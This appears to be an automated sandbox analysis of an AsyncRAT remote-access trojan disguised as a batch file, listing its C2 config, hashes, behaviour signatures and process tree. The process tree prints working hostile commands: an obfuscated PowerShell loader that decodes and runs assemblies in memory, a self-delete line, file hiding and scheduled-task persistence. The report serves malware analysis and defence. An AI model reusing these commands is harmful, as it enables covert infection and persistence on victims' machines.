Overview

overview

10

Static

static

10

Repo/bin/dll.bat

windows10-2004-x64

10

Repo/bin/unam.exe

windows10-2004-x64

1

Silent Cry...er.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    142s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-07-2024 00:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Repo/bin/dll.bat

  • Size

    382KB

  • MD5

    8b1f260a182f74419011f14a8ba21a37

  • SHA1

    48d8da3f5971ebd6b358b6b63491b5e68f099a6c

  • SHA256

    478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

  • SHA512

    509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

  • SSDEEP

    6144:UJ+xnM15AXYHvdijZhhzPrJaBuLEQ/npzItPvshlqfyef:f8udDJ5hmPvqlRy

Score
10/10
asyncratunamdefense_evasionexecutionratspywarestealer

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

unam

C2

windowsignn.theworkpc.com:6606

Mutex

AsyncMutex_5552

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4136
    • C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2660);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4560
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe" & exit
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:1036
        • C:\Windows\system32\attrib.exe
          ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe"
          4⤵
          • Views/modifies file attributes
          PID:4088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4448
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2188
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:972
          • C:\Users\Admin\AppData\Roaming\startup_str.bat.exe
            "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3256
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3256);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2664
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" & exit
              6⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:3888
              • C:\Windows\system32\attrib.exe
                ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe"
                7⤵
                • Views/modifies file attributes
                PID:1400

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f6b2e853b3b08f8fc1ba32513cad892b

    SHA1

    49c8f4c791680b4727078af362969c6efb6696a7

    SHA256

    2f3c97cc230f8039159563fd63fd8ded938945c66384500aded970893755877e

    SHA512

    040d75a0b1191ed2bfc5e7f595141ee7d22e666eb01604dee5049c8ab2143eeeabe39c16829e4d979cae11a13923b1e3dd50f5b361a082471641ecab3001e37d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wlqzxx5.21w.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str.bat
    Filesize

    382KB

    MD5

    8b1f260a182f74419011f14a8ba21a37

    SHA1

    48d8da3f5971ebd6b358b6b63491b5e68f099a6c

    SHA256

    478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

    SHA512

    509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str.vbs
    Filesize

    111B

    MD5

    371257951e09cb56fafbbda4847cbcb7

    SHA1

    6d9dab286de574a099f6fe955720a1d87484cea3

    SHA256

    bb77d873388b64bacd10df67a60d012ed4acc5b03b7fa1070584b7133fa371b3

    SHA512

    1dffef10d8f25f6df8db17d09b278701211a40497d3aa8749676aeca3426cdc63232135984e74c8abf73442d917df7288b15d93229d8090684f3acba224f9bc1

    Download Submit

  • memory/2660-16-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-10-0x000002AC507A0000-0x000002AC507C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2660-80-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-18-0x000002AC6AC30000-0x000002AC6AC7A000-memory.dmp

    Filesize

    296KB

    Download

  • memory/2660-4-0x00007FF8B4DC3000-0x00007FF8B4DC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2660-33-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2660-17-0x000002AC50810000-0x000002AC5081A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2660-15-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3256-79-0x00000247B1160000-0x00000247B1176000-memory.dmp

    Filesize

    88KB

    Download

  • memory/3256-78-0x00000247B1150000-0x00000247B115C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/4560-30-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4560-29-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4560-28-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4560-82-0x00007FF8B4DC0000-0x00007FF8B5881000-memory.dmp

    Filesize

    10.8MB

    Download